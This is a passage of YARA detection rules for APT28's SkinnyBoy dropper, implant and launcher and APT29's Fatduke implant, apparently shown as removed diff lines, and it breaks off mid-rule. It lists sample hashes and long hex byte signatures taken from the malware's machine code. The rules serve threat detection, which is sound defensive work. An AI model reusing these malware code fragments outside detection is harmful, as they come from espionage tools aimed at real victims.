"https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-06-06/APT28/MAL_SkinnyBoy_Dropper_Jun_2021_1.yara#L1-L19" - license_url = "N/A" - logic_hash = "805bc5bb5833a75d68df2a6ce828d70b2257809a3699fdca5e621aae6bdc5070" - score = 75 - quality = 73 - tags = "FILE" - hash1 = "12331809c3e03d84498f428a37a28cf6cbb1dafe98c36463593ad12898c588c9" - tlp = "White" - adversary = "APT28" - - strings: - $s1 = { 55 8b ec b8 48 12 00 00 e8 a3 52 00 00 a1 00 d0 40 00 33 c5 89 45 fc 56 57 68 08 02 00 00 8d 85 cc ed ff ff 50 51 ff 15 2c 80 40 00 6a 00 68 80 00 00 00 6a 03 6a 00 6a 01 68 00 00 00 80 8d 85 cc ed ff ff 50 c7 85 b8 ed ff ff 00 00 00 00 ff 15 18 80 40 00 8b f0 ff 15 1c 80 40 00 8b f8 83 fe ff 74 12 6a 00 56 ff 15 58 80 40 00 56 8b f8 ff 15 20 80 40 00 8d 85 c8 ed ff ff 50 8d 95 b8 ed ff ff 8d 8d cc ed ff ff 89 bd c8 ed ff ff e8 bc fd ff ff 8b bd b8 ed ff ff b8 4d 5a 00 00 83 c4 04 66 39 07 74 1b 68 c1 00 00 00 ff 15 34 80 40 00 5f 5e 8b 4d fc 33 cd e8 fe 08 00 00 8b e5 } - $s2 = { 8b 47 3c 81 3c 07 50 45 00 00 75 d9 8b 47 1c 8b b5 c8 ed ff ff 8b 4f 20 2b f0 85 c9 74 04 8b f1 2b f0 53 56 6a 08 ff 15 0c 80 40 00 50 ff 15 08 80 40 00 8b 4f 1c 56 03 cf 8b d8 51 53 89 9d c4 ed ff ff e8 96 5d 00 00 68 08 02 00 00 8d 85 f4 f9 ff ff 6a 00 50 e8 33 25 00 00 83 c4 18 8d 85 f4 f9 ff ff 50 6a 00 6a 00 68 1c 80 00 00 6a 00 ff 15 30 81 40 00 b8 18 00 00 00 68 ee 00 00 00 66 89 85 0c fc ff ff 8d 85 0e fc ff ff 6a 00 50 c7 85 fc fb ff ff 00 00 3f 00 c7 85 00 fc ff ff 47 00 5b 00 c7 85 04 fc ff ff 09 00 19 00 c7 85 08 fc ff ff 08 00 0d 00 e8 d1 24 00 00 f3 0f 7e 05 c4 bd 40 00 a1 d4 bd 40 00 68 ec 00 00 00 89 85 0c ff ff ff 66 0f d6 85 fc fe ff ff f3 0f 7e 05 cc bd 40 00 8d 85 10 ff ff ff 6a 00 50 66 0f d6 85 04 ff ff ff e8 93 24 00 00 83 c4 18 33 } - $s3 = { 0f b7 8c 05 fc fe ff ff 66 31 8c 05 fc fb ff ff 0f b7 8c 05 fe fe ff ff 66 31 8c 05 fe fb ff ff 0f b7 8c 05 00 ff ff ff 66 31 8c 05 00 fc ff ff 0f b7 8c 05 02 ff ff ff 66 31 8c 05 02 fc ff ff 83 c0 08 3d 00 01 00 00 72 b6 8d 85 f4 f9 ff ff 50 ff 15 38 81 40 00 8d 85 fc fb ff ff 50 8d 85 f4 f9 ff ff 50 ff 15 40 80 40 00 6a 00 8d 85 f4 f9 ff ff 50 ff 15 28 80 40 00 68 d8 00 00 00 8d 85 24 fe ff ff 6a 00 50 c7 85 fc fd ff ff 1f 00 33 00 c7 85 00 fe ff ff 58 00 4e 00 c7 85 04 fe ff ff 5d 00 1b 00 c7 85 08 fe ff ff 59 00 27 00 c7 85 0c fe ff ff 70 00 2d 00 c7 85 10 fe ff ff 16 00 13 00 c7 85 14 fe ff ff 03 00 1c 00 c7 85 18 fe ff ff 0d 00 2a 00 c7 85 1c fe ff ff 07 00 51 00 c7 85 20 fe ff ff 08 00 13 00 e8 8f 23 00 00 f3 0f 7e 05 d8 bd 40 00 66 a1 00 be 40 00 66 0f d6 85 fc fe ff ff f3 0f 7e 05 e0 bd 40 00 66 0f d6 85 04 ff ff ff f3 0f 7e 05 e8 bd 40 00 66 0f d6 85 0c ff ff ff f3 0f 7e 05 f0 bd 40 00 68 d6 00 00 00 66 89 85 24 ff ff ff 66 0f d6 85 14 ff ff ff f3 0f 7e 05 f8 bd 40 00 8d 85 26 ff ff ff 6a 00 50 66 0f d6 85 1c ff ff ff e8 1f 23 00 00 83 c4 18 33 } - $s4 = { 0f b7 84 0d fc fe ff ff 66 31 84 0d fc fc ff ff 0f b7 84 0d fe fe ff ff 66 31 84 0d fe fc ff ff 0f b7 84 0d 00 ff ff ff 66 31 84 0d 00 fd ff ff 0f b7 84 0d 02 ff ff ff 66 31 84 0d 02 fd ff ff 83 c1 08 81 f9 00 01 00 00 72 b5 8d 85 f4 f9 ff ff 50 ff 15 38 81 40 00 8d 85 fc fc ff ff 50 8d 85 f4 f9 ff ff 50 ff 15 40 80 40 00 6a 00 6a 00 8d 85 c0 ed ff ff 50 6a 00 6a 01 56 53 8b 1d 00 80 40 00 c7 85 c0 ed ff ff 00 00 00 00 ff d3 ff b5 c0 ed ff ff 6a 08 ff 15 0c 80 40 00 50 ff 15 08 80 40 00 6a 00 6a 00 8d 8d c0 ed ff ff 51 50 6a 01 56 ff b5 c4 ed ff ff 89 85 bc ed ff ff ff d3 8b 85 c0 ed ff ff 6a 00 68 80 00 00 00 6a 04 6a 00 6a 02 89 85 b8 ed ff ff 68 00 00 00 40 8d 85 f4 f9 ff ff 50 ff 15 18 80 40 00 8b f0 ff 15 1c 80 40 00 8b 1d 38 80 40 00 83 fe ff 74 55 3d b7 00 00 00 75 0b 6a 00 6a 00 6a 00 56 ff } - $s5 = { 55 8b ec 83 ec 0c a1 00 d0 40 00 33 c5 89 45 fc 53 8b 5d 08 56 57 6a 00 68 80 00 00 00 6a 03 6a 00 6a 01 68 00 00 00 80 51 89 55 f4 ff 15 18 80 40 00 8b f0 ff 15 1c 80 40 00 8b f8 83 fe ff 74 67 83 ff 02 74 62 6a 00 56 ff 15 58 80 40 00 89 03 85 c0 74 47 c7 45 f8 00 00 00 00 ff 15 0c 80 40 00 ff 33 6a 08 50 ff 15 08 80 40 00 8b 4d f4 6a 00 89 01 8d 4d f8 51 ff 33 50 56 ff 15 14 80 40 00 56 ff 15 20 80 40 00 8b c7 5f 5e 5b 8b 4d fc 33 cd e8 d4 0a 00 00 8b e5 } - $s6 = { 54 56 71 51 41 41 4d 41 41 41 41 45 41 41 41 41 2f 2f } - - condition: - uint16(0)==0x5a4d and filesize >40KB and 5 of ($s*) -} -rule ARKBIRD_SOLG_MAL_Skinnyboy_Implant_Jun_2021_1 : FILE -{ - meta: - description = "Detect SkinnyBoy Implant" - author = "Arkbird_SOLG" - id = "2c78e0f3-a0b3-56fb-b4d2-313c03f1331b" - date = "2021-06-05" - modified = "2021-06-06" - reference = "https://cluster25.io/wp-content/uploads/2021/05/2021-05_FancyBear.pdf" - source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-06-06/APT28/MAL_SkinnyBoy_Implant_Jun_2021_1.yara#L1-L19" - license_url = "N/A" - logic_hash = "37d6b03adaad0a97e91a366d8e5ce47bc0eb77263849422129edf9df28d25bd8" - score = 75 - quality = 75 - tags = "FILE" - hash1 = "ae0bc3358fef0ca2a103e694aa556f55a3fed4e98ba57d16f5ae7ad4ad583698" - tlp = "White" - adversary = "APT28" - - strings: - $s1 = { 55 8b ec 81 ec 48 01 00 00 a1 00 00 01 10 33 c5 89 45 fc 53 56 57 6a 00 6a 00 6a 00 8b c2 6a 00 68 6c ef 00 10 89 85 d0 fe ff ff 89 8d cc fe ff ff 89 85 e4 fe ff ff c7 85 c0 fe ff ff 01 00 00 00 c7 85 d8 fe ff ff 00 00 00 00 c7 85 dc fe ff ff 00 00 00 00 ff 15 e4 b1 00 10 8b 1d a4 b0 00 10 8b f0 89 b5 d4 fe ff ff ff d3 8b 3d d4 b1 00 10 85 f6 74 26 6a 04 8d 85 ec fe ff ff 50 6a 06 56 c7 85 ec fe ff ff c0 27 09 00 ff d7 6a 04 8d 85 ec fe ff ff 50 6a 05 56 ff d7 ff d3 85 f6 74 22 6a 01 6a 00 6a 03 6a 00 6a 00 68 bb 01 00 00 ff b5 cc fe ff ff 56 ff 15 cc b1 00 10 89 85 d8 fe ff ff ff d3 8b 4d 08 8b 3d e8 b1 00 10 81 f9 00 00 a0 00 0f 83 a7 01 00 00 68 03 01 00 00 8d 85 f1 fe ff ff 6a 00 50 c6 85 f0 fe ff ff 00 e8 3c 33 00 00 83 c4 0c ba 01 00 00 00 6a 00 6a 01 8d 8d f0 fe ff ff e8 55 f7 ff ff 83 c4 08 8d 55 08 8d 8d e4 fe ff ff e8 94 f6 ff ff 8d bd f0 fe ff ff 8d 4f 01 8a 07 47 84 c0 75 f9 8b 75 08 2b f9 8d 04 37 50 6a 08 89 85 e0 fe ff ff ff 15 b4 b0 00 10 50 ff 15 ec b0 00 10 57 8d 8d f0 fe ff ff 51 50 89 85 d0 fe ff ff e8 62 6e 00 00 8b 85 d0 fe ff ff 83 c4 0c 03 c7 56 8b b5 e4 fe ff ff 56 50 e8 49 6e 00 00 83 c4 0c 56 6a 00 ff 15 b4 b0 00 10 50 a1 b8 b0 00 10 ff d0 57 8d 85 f0 fe ff ff 6a 00 50 e8 96 32 00 00 83 c4 0c 8d 8d d4 fe ff ff 6a 01 ff b5 e0 fe ff ff ff b5 d0 fe ff ff e8 8a f3 ff ff 85 c0 0f 84 7c 03 00 00 8b 85 d4 fe ff ff 8b 3d e8 b1 00 10 85 c0 74 03 50 ff d7 8b 85 d8 fe ff ff 85 } - $s2 = { 33 d2 8b c1 b9 00 00 20 00 f7 f1 33 c9 89 8d e4 fe ff ff 3b ca 89 95 b8 fe ff ff 1b d2 f7 da 03 d0 89 95 c4 fe ff ff 0f 84 98 02 00 00 8b ff 8b b5 b8 fe ff ff 85 f6 74 09 8d 42 ff 8b fe 3b c8 74 05 bf 00 00 20 00 57 6a 08 ff 15 b4 b0 00 10 50 ff 15 ec b0 00 10 8b 8d e4 fe ff ff 0f af cf 03 8d d0 fe ff ff 57 8b f0 51 56 89 b5 ec fe ff ff e8 c9 6c 00 00 83 c4 0c 8d 85 f1 fe ff ff 68 03 01 00 00 6a 00 50 c6 85 f0 fe ff ff 00 e8 1c 31 00 00 8b 85 e4 fe ff ff 83 c4 0c 40 6a 00 ff b5 c4 fe ff ff 8b d0 8d 8d f0 fe ff ff 89 85 e4 fe ff ff e8 27 f5 ff ff 83 c4 08 8d 85 e0 fe ff ff 50 6a 00 6a 01 57 56 c7 85 e0 fe ff ff 00 00 00 00 ff 15 24 b0 00 10 85 c0 74 4c ff b5 e0 fe ff ff 6a 08 ff 15 b4 b0 00 10 50 ff 15 ec b0 00 10 8b f0 8d 85 e0 fe ff ff 50 56 6a 01 57 8b bd ec fe ff ff 57 ff 15 24 b0 00 10 57 6a 00 ff 15 b4 b0 00 10 50 a1 b8 b0 00 10 ff d0 8b bd e0 fe ff ff 89 b5 ec fe ff ff 8d b5 f0 fe ff ff 8d 4e 01 8a 06 46 84 c0 75 f9 2b f1 8d 04 3e 50 6a 08 89 85 c8 fe ff ff ff 15 b4 b0 00 10 50 ff 15 ec b0 00 10 56 8d 8d f0 fe ff ff 51 50 89 85 bc fe ff ff e8 d8 6b 00 00 8b 8d bc fe ff ff 83 c4 0c 03 ce 57 8b bd ec fe ff ff 57 51 e8 bf 6b 00 00 83 c4 0c 57 6a 00 ff 15 b4 b0 00 10 50 ff 15 b8 b0 00 10 56 8d 85 f0 fe ff ff 6a 00 50 e8 0d 30 00 00 8b b5 c0 fe ff ff 8b bd bc fe ff ff 83 c4 0c 8d 8d d4 fe ff ff 56 ff b5 c8 fe ff ff 57 e8 fb f0 ff ff 85 c0 0f 84 c9 00 00 00 85 f6 0f 84 c1 00 00 00 8b 85 d4 fe ff ff 8b 35 e8 b1 00 10 85 } - $s3 = { 55 8b ec 83 e4 f8 81 ec 34 02 00 00 a1 00 00 01 10 33 c4 89 84 24 30 02 00 00 53 56 57 6a ff ff 35 28 1b 01 10 ff 15 4c b0 00 10 ff 35 28 1b 01 10 ff 15 80 b0 00 10 8b 35 b8 b0 00 10 8b 3d b4 b0 00 10 8d 44 24 10 50 8d 54 24 10 c7 44 24 10 00 00 00 00 c7 44 24 14 00 00 00 00 e8 df 0a 00 00 8b 4c 24 14 83 c4 04 85 c9 0f 84 e6 02 00 00 8b 54 24 0c 33 c0 33 db c7 44 24 20 00 00 00 00 89 44 24 1c 85 c9 0f 84 c2 02 00 00 8d 64 24 00 8b 34 13 8d 04 13 56 6a 08 ff d7 50 ff 15 ec b0 00 10 8b c8 8b 44 24 0c 83 c0 04 56 03 c3 50 51 89 4c 24 24 e8 a7 7e 00 00 8b 44 24 18 03 c3 83 c4 0c 8b 44 06 04 50 6a 08 89 44 24 1c ff d7 50 ff 15 ec b0 00 10 ff 74 24 14 8b f8 8b 44 24 10 03 c3 83 c6 08 03 c6 50 57 e8 72 7e 00 00 83 c4 0c 68 04 01 00 00 6a 08 ff 15 b4 b0 00 10 50 ff 15 ec b0 00 10 68 00 00 00 f0 6a 18 6a 00 8b f0 6a 00 8d 44 24 34 50 c7 44 24 38 00 00 00 00 c7 44 24 3c 00 00 00 00 ff 15 18 b0 00 10 } - $s4 = { ff 15 a4 b0 00 10 8d 44 24 28 50 6a 00 6a 00 68 0c 80 00 00 ff 74 24 34 ff 15 14 b0 00 10 ff 15 a4 b0 00 10 6a 00 ff 74 24 18 57 ff 74 24 34 ff 15 0c b0 00 10 ff 15 a4 b0 00 10 6a 00 8d 44 24 30 50 56 6a 02 ff 74 24 38 c7 44 24 40 04 01 00 00 ff 15 10 b0 00 10 ff 74 24 28 ff 15 00 b0 00 10 6a 00 ff 74 24 28 ff 15 04 b0 00 10 8b 54 24 2c 8b 44 24 18 } - $s5 = { 50 68 04 01 00 00 ff 15 a8 b0 00 10 8d 44 24 30 50 ff 15 a0 b1 00 10 68 18 ee 00 10 8d 44 24 34 50 ff 15 9c b0 00 10 b8 4d 5a 00 00 66 39 07 0f 85 b2 00 00 00 6a 00 68 80 00 00 00 6a 04 6a 00 6a 02 68 00 00 00 40 8d 44 24 48 50 ff 15 40 b0 00 10 8b f0 ff 15 a4 b0 00 10 83 fe } - $s6 = { 6a 00 8d 44 24 28 50 ff 74 24 1c c7 44 24 30 00 00 00 00 57 56 ff 15 38 b0 00 10 56 ff 15 44 b0 00 10 68 80 00 00 00 8d 44 24 34 50 ff 15 48 b0 00 10 8d 44 24 30 50 ff 15 a4 b1 00 10 85 c0 74 2d 8d 44 24 30 50 ff 15 b0 b0 00 10 8b f0 6a 01 56 ff 15 a0 b0 00 10 8d 4c 24 20 51 a3 20 1b 01 10 ff d0 56 89 44 24 20 ff 15 f4 b0 00 10 e8 ad f3 ff ff 57 8b 3d b4 b0 00 10 6a 00 ff d7 8b 35 b8 b0 00 10 50 ff d6 ff 74 24 18 6a 00 ff d7 50 ff d6 8b 44 24 1c 85 c0 74 12 8b 54 24 20 50 b9 4c ef 00 10 e8 77 0c 00 00 83 c4 04 8b 54 24 0c 8b 0c 13 8d 04 13 8d 04 19 83 c3 08 8b 44 10 04 03 c1 03 d8 3b 5c 24 10 0f 82 42 fd ff ff 52 6a 00 ff d7 50 ff d6 68 00 dd 6d 00 ff 35 28 1b 01 10 ff 15 4c b0 00 10 85 c0 0f 85 d4 fc ff ff } - - condition: - uint16(0)==0x5a4d and filesize >40KB and 5 of ($s*) -} -rule ARKBIRD_SOLG_MAL_Skinnyboy_Launcher_Jun_2021_1 : FILE -{ - meta: - description = "Detect the Launcher of SkinnyBoy" - author = "Arkbird_SOLG" - id = "4e69cba4-92ef-5ea5-95d8-b22ed77f515c" - date = "2021-06-05" - modified = "2021-06-06" - reference = "https://cluster25.io/wp-content/uploads/2021/05/2021-05_FancyBear.pdf" - source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-06-06/APT28/MAL_SkinnyBoy_Launcher_Jun_2021_1.yara#L1-L19" - license_url = "N/A" - logic_hash = "4d5906832a1bc90552255ada1cc9e3c7cd3e14e4b0cb11b1bf2c11c57bca8ad8" - score = 75 - quality = 75 - tags = "FILE" - hash1 = "2a652721243f29e82bdf57b565208c59937bbb6af4ab51e7b6ba7ed270ea6bce" - tlp = "White" - adversary = "APT28" - - strings: - $s1 = { 55 8b ec 83 e4 f8 81 ec bc 06 00 00 a1 00 e0 40 00 33 c4 89 84 24 b8 06 00 00 53 56 57 33 c0 68 06 02 00 00 50 66 89 84 24 b8 02 00 00 8d 84 24 ba 02 00 00 50 8b f1 e8 64 31 00 00 8b 1d 28 90 40 00 0f 57 c0 83 c4 0c 8d 84 24 9c 02 00 00 50 c7 84 24 a0 02 00 00 79 00 00 00 66 0f d6 84 24 a4 02 00 00 66 0f d6 84 24 ac 02 00 00 c7 84 24 78 02 00 00 57 00 00 00 66 0f d6 84 24 7c 02 00 00 66 0f d6 84 24 84 02 00 00 ff d3 8b d0 33 c9 89 15 38 fb 40 00 85 d2 74 1b 8d 9b 00 00 00 00 66 8b 84 4c 74 02 00 00 66 31 84 4c 9c 02 00 00 41 3b ca 72 eb a1 80 cd 40 00 89 84 24 88 02 00 00 0f b7 05 84 cd 40 00 66 89 84 24 8c 02 00 00 a1 88 cd 40 00 89 84 24 74 02 00 00 0f b7 05 8c cd 40 00 66 89 84 24 78 02 00 00 0f 57 c0 8d 84 24 88 02 00 00 50 66 0f d6 84 24 92 02 00 00 c7 84 24 9a 02 00 00 00 00 00 00 66 c7 84 24 9e 02 00 00 00 00 66 0f d6 84 24 7e 02 00 00 c7 84 24 86 02 00 00 00 00 00 00 66 c7 84 24 8a 02 00 00 00 00 ff d3 8b d0 33 c9 89 15 38 fb 40 00 } - $s2 = { 66 8b 84 4c 74 02 00 00 66 31 84 4c 88 02 00 00 41 3b ca 72 eb 6a 64 6a 08 ff 15 30 90 40 00 50 ff 15 34 90 40 00 8b 1d 3c 90 40 00 89 44 24 0c 56 8d 84 24 b4 02 00 00 50 ff d3 8b 3d 44 91 40 00 8d 84 24 b0 02 00 00 50 ff d7 68 90 cd 40 00 8d 84 24 b4 02 00 00 50 ff d3 8d 44 24 20 50 8d 84 24 b4 02 00 00 50 ff 15 40 90 40 00 8b f0 8d 84 24 b0 02 00 00 50 89 74 24 14 ff 15 40 91 40 00 8d 84 24 b0 02 00 00 50 ff d7 83 fe ff 0f 84 21 02 00 00 8b 35 2c 90 40 00 8d 9b 00 00 00 00 8d 84 24 9c 02 00 00 50 8d 44 24 50 50 ff d6 85 } - $s3 = { ff 15 20 90 40 00 8d 44 24 14 50 6a 00 6a 00 68 0c 80 00 00 ff 74 24 28 ff 15 04 90 40 00 ff 15 20 90 40 00 6a 00 56 8d 44 24 54 50 ff 74 24 20 ff 15 14 90 40 00 ff 15 20 90 40 00 6a 00 8d 44 24 20 50 ff 74 24 14 c7 44 24 28 64 00 00 00 6a 02 ff 74 24 24 ff 15 10 90 40 00 ff 74 24 14 ff 15 00 90 40 00 6a 00 ff 74 24 1c ff 15 0c 90 40 00 8b 74 24 1c 8b 4c 24 0c ba 90 ed 40 00 83 ee } - $s4 = { 0f b7 8c 05 f8 fd ff ff 66 31 8c 05 f8 fe ff ff 0f b7 8c 05 fa fd ff ff 66 31 8c 05 fa fe ff ff 0f b7 8c 05 fc fd ff ff 66 31 8c 05 fc fe ff ff 0f b7 8c 05 fe fd ff ff 66 31 8c 05 fe fe ff ff 83 c0 08 3d 00 01 00 00 72 b6 56 8d 85 f8 fe ff ff 50 8d 85 f0 fb ff ff 68 08 02 00 00 50 e8 ed 04 00 00 6a 44 8d 85 98 fb ff ff 6a 00 50 e8 ed 31 00 00 83 c4 1c 8d 85 e0 fb ff ff 50 8d 85 98 fb ff ff 50 6a 00 6a 00 68 00 00 00 08 6a 00 6a 00 6a 00 8d 85 f0 fb ff ff 50 6a 00 c7 85 98 fb ff ff 44 00 00 00 ff 15 38 90 40 00 8b 4d fc 33 cd 5e e8 b9 04 00 00 8b e5 } - $s5 = { 55 8b ec 81 ec 6c 04 00 00 a1 00 e0 40 00 33 c5 89 45 fc 56 33 c0 68 06 02 00 00 50 66 89 85 f0 fb ff ff 8d 85 f2 fb ff ff 50 8b f1 e8 8f 33 00 00 68 04 01 00 00 8d 85 f0 fb ff ff 6a 00 50 e8 7c 33 00 00 83 c4 18 56 ff 15 48 91 40 00 85 c0 0f 84 b6 01 00 00 b8 69 00 00 00 68 d2 00 00 00 66 89 85 24 ff ff ff 8d 85 26 ff ff ff 6a 00 50 c7 85 f8 fe ff ff 1f 00 16 00 c7 85 fc fe ff ff 0b 00 22 00 c7 85 00 ff ff ff 78 00 7c 00 c7 85 04 ff ff ff 00 00 55 00 c7 85 08 ff ff ff 5b 00 2e 00 c7 85 0c ff ff ff 3f 00 03 00 c7 85 10 ff ff ff 04 00 04 00 c7 85 14 ff ff ff 0d 00 15 00 c7 85 18 ff ff ff 47 00 44 00 c7 85 1c ff ff ff 47 00 14 00 c7 85 20 ff ff ff 09 00 68 00 e8 dd 32 00 00 f3 0f 7e 05 48 cd 40 00 66 0f d6 85 f8 fd ff ff f3 0f 7e 05 50 cd 40 00 66 0f d6 85 00 fe ff ff f3 0f 7e 05 58 cd 40 00 66 0f d6 85 08 fe ff ff f3 0f 7e 05 60 cd 40 00 66 0f d6 85 10 fe ff ff f3 0f 7e 05 68 cd 40 00 68 d0 00 00 00 66 0f d6 85 18 fe ff ff f3 0f 7e 05 70 cd 40 00 8d 85 28 fe ff ff 6a 00 50 66 0f d6 85 20 fe ff ff e8 6a 32 00 00 83 c4 18 33 } - $s6 = { 0f b7 8c 05 f8 fd ff ff 66 31 8c 05 f8 fe ff ff 0f b7 8c 05 fa fd ff ff 66 31 8c 05 fa fe ff ff 0f b7 8c 05 fc fd ff ff 66 31 8c 05 fc fe ff ff 0f b7 8c 05 fe fd ff ff 66 31 8c 05 fe fe ff ff 83 c0 08 3d 00 01 00 00 72 b6 56 8d 85 f8 fe ff ff 50 8d 85 f0 fb ff ff 68 08 02 00 00 50 e8 ed 04 00 00 6a 44 8d 85 98 fb ff ff 6a 00 50 e8 ed 31 00 00 83 c4 1c 8d 85 e0 fb ff ff 50 8d 85 98 fb ff ff 50 6a 00 6a 00 68 00 00 00 08 6a 00 6a 00 6a 00 8d 85 f0 fb ff ff 50 6a 00 c7 85 98 fb ff ff 44 00 00 00 ff 15 38 90 40 00 8b 4d fc 33 cd 5e e8 b9 04 00 00 8b e5 } - - condition: - uint16(0)==0x5a4d and filesize >40KB and 5 of ($s*) -} -rule ARKBIRD_SOLG_APT_APT29_Fatduke_Mar_2021_1 : FILE -{ - meta: - description = "Detect Fatduke implant used by APT29 group" - author = "Arkbird_SOLG" - id = "aed6d6f0-1baf-5842-8ced-e07f213ef1ff" - date = "2021-03-08" - modified = "2021-03-10" - reference = "Internal Research" - source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-03-09/APT29/APT_APT29_Fatduke_Mar_2021_1.yar#L1-L25" - license_url = "N/A" - logic_hash = "2aec00355b14ec81f577527d3eba1f682ce96cc9e6ac7727b3865ddf01ddf69a" - score = 50 - quality = 67 - tags = "FILE" - hash1 = "0be57d1244fefc679feb7aa9996e539481be7b8f4c9246817f81caa8c2f61a57" - level = "Experimental" - - strings: - $seq1 = { 5b 8d 8d 5c ff ff ff c7 85 5c ff ff ff 48 74 74 70 51 8d 85 6c ff ff ff c7 85 60 ff ff ff 4f 70 65 6e 50 51 8d 8d 14 fc ff ff c7 85 64 ff ff ff 52 65 71 75 c7 85 68 ff ff ff 65 73 74 57 e8 ce 7b f2 ff c6 45 fc 33 83 78 14 10 72 02 8b 00 50 8d 8d 90 fc ff ff e8 16 7b f2 ff c6 45 fc 34 8d 85 90 fc ff ff 50 8d 85 80 fb ff ff 8b cb 50 e8 bd 74 00 00 8b f0 c6 45 fc 35 8d 87 d0 00 00 00 3b c6 74 2a 8b 48 10 85 c9 74 1b 8b 11 3b c8 0f 95 c0 0f b6 c0 50 ff 52 10 8d 87 d0 00 00 00 c7 40 10 00 00 00 00 56 8b c8 e8 c3 2e f6 ff c6 45 fc 34 8d 8d 80 fb ff ff e8 a4 7e f2 ff c6 45 fc 33 83 bd a4 fc ff ff 10 72 0e ff b5 90 fc ff ff e8 71 0d 17 00 83 c4 04 c7 85 a4 fc ff ff 0f 00 00 00 c7 85 a0 fc ff ff 00 00 00 00 c6 85 90 fc ff ff 00 c6 45 fc 1b 83 bd 28 fc ff ff 10 72 0e ff b5 14 fc ff ff e8 3b 0d 17 00 83 c4 04 c7 85 28 fc ff ff 0f 00 00 00 c7 85 24 fc ff ff 00 00 00 00 c6 85 14 fc ff ff 00 57 bf 0b 3b 0e 02 31 cf 21 d7 21 ff bf 2b 34 81 13 21 c7 09 cf 5f 56 be 22 0c d2 00 be 80 41 78 6d 31 e6 21 ee be 55 13 41 71 90 5e 8d 8d 1c ff ff ff c7 85 1c ff ff ff 48 74 74 70 51 8d 85 32 ff ff ff c7 85 20 ff ff ff 41 64 64 52 50 51 8d 8d 2c fc ff ff c7 85 24 ff ff ff 65 71 75 65 c7 85 28 ff ff ff 73 74 48 65 c7 85 2c ff ff ff 61 64 65 72 66 c7 85 30 ff ff ff 73 57 e8 67 7a f2 ff c6 45 fc 36 83 78 14 10 72 02 8b 00 50 8d 8d 38 fd ff ff e8 af 79 f2 ff c6 45 fc 37 8d 85 38 fd ff ff 50 8d 85 c8 fb ff ff 8b cb 50 e8 36 b1 ff ff 8b f0 c6 45 fc 38 8d 87 e8 00 00 00 3b c6 74 2a 8b 48 10 85 c9 74 1b 8b 11 3b c8 0f 95 c0 0f b6 c0 50 ff 52 10 8d 87 e8 00 00 00 c7 40 10 00 00 00 00 56 8b c8 e8 5c 2d f6 ff c6 45 fc 37 8d 8d c8 fb ff ff e8 3d 7d f2 ff c6 45 fc 36 83 bd 4c fd ff ff 10 72 0e ff b5 38 fd ff ff e8 0a 0c 17 00 83 c4 04 c7 85 4c fd ff ff 0f 00 00 00 c7 85 48 fd ff ff 00 00 00 00 c6 85 38 fd ff ff 00 c6 45 fc 1b 83 bd 40 fc ff ff 10 72 0e ff b5 2c fc ff ff e8 d4 0b 17 00 83 c4 04 c7 85 40 fc ff ff 0f 00 00 00 c7 85 3c fc ff ff 00 00 00 00 c6 85 2c fc ff ff 00 50 b8 dc 4d a8 4d b8 4f 50 97 15 b8 97 55 f0 68 01 c0 01 e8 90 58 50 b8 e6 6f 71 3c 21 e0 21 e8 21 f0 21 c0 31 f0 b8 fa 02 db 55 58 8d 8d 7c ff ff ff c7 85 7c ff ff ff 48 74 74 70 51 8d 45 8c c7 45 80 53 65 6e 64 50 51 8d 8d 60 fc ff ff c7 45 84 52 65 71 75 c7 45 88 65 73 74 57 e8 1f 79 f2 ff c6 45 fc 39 83 78 14 10 72 02 8b 00 50 8d 8d 08 fd ff ff e8 67 78 f2 ff c6 45 fc 3a 8d 85 08 fd ff ff 50 8d 85 f8 fb ff ff 8b cb 50 e8 4e 75 00 00 8b f0 c6 45 fc 3b 8d 87 00 01 00 00 3b c6 74 2a 8b 48 10 85 c9 74 1b 8b 11 3b c8 0f 95 c0 0f b6 c0 50 ff 52 10 8d 87 00 01 00 00 c7 40 10 00 00 00 00 56 8b c8 e8 14 2c f6 ff c6 45 fc 3a 8d 8d f8 fb ff ff e8 f5 7b f2 ff c6 45 fc 39 83 bd 1c fd ff ff 10 72 0e ff b5 08 fd ff ff e8 c2 0a 17 00 83 c4 04 c7 85 1c fd ff ff 0f 00 00 00 c7 85 18 fd ff ff 00 00 00 00 c6 85 08 fd ff ff 00 c6 45 fc 1b 83 bd 74 fc ff ff 10 72 0e ff b5 60 fc ff ff e8 8c 0a 17 00 83 c4 04 c7 85 74 fc ff ff 0f 00 00 00 c7 85 70 fc ff ff 00 00 00 00 c6 85 60 fc ff ff 00 50 01 c8 21 f8 b8 f5 2f 8f 4d 01 e8 09 d0 01 c0 b8 4e 35 2f 2a 58 52 ba 6d 65 6b 13 01 fa 09 da 31 c2 09 da ba c9 1d 51 12 31 c2 5a 8d 4d 9c c7 45 9c 48 74 74 70 51 8d 45 aa c7 45 a0 51 75 65 72 50 51 8d 8d 48 fc ff ff c7 45 a4 79 49 6e 66 66 c7 45 a8 6f 57 e8 de 77 f2 ff c6 45 fc 3c 83 78 14 10 72 02 8b 00 50 8d 8d 50 fd ff ff e8 26 77 f2 ff c6 45 fc 3d 8d 85 50 fd ff ff 50 8d 85 98 fb ff ff 8b cb 50 e8 4d 77 00 00 8b f0 c6 45 fc 3e 8d 9f 18 01 00 00 3b de 74 24 8b 4b 10 85 c9 74 15 8b 11 3b cb 0f 95 c0 0f b6 c0 50 ff 52 10 c7 43 10 00 00 00 00 56 8b cb e8 d9 2a f6 ff c6 45 fc 3d 8d 8d 98 fb ff ff e8 ba 7a f2 ff c6 45 fc 3c 83 bd 64 fd ff ff 10 72 0e ff b5 50 fd ff ff e8 87 09 17 00 83 c4 04 c7 85 64 fd ff ff 0f 00 00 00 c7 85 60 fd ff ff 00 00 00 00 c6 85 50 fd ff ff 00 c6 45 fc 1b 83 bd 5c fc ff ff 10 72 0e ff b5 48 fc ff ff e8 51 09 17 00 83 c4 04 c7 85 5c fc ff ff 0f 00 00 00 c7 85 58 fc ff ff 00 00 00 00 c6 85 48 fc ff ff 00 56 01 d6 19 ee be ed 3e 23 0c 01 fe 21 e6 be db 1f 20 70 31 e6 5e 57 29 c7 bf 8d 30 ff 05 bf 4e 30 f9 71 19 f7 29 f7 31 ff 09 ef 5f 68 b8 b3 2b 10 8d 8d d8 fc ff ff e8 22 76 f2 ff c6 45 fc 3f 8d 8d d8 fc ff 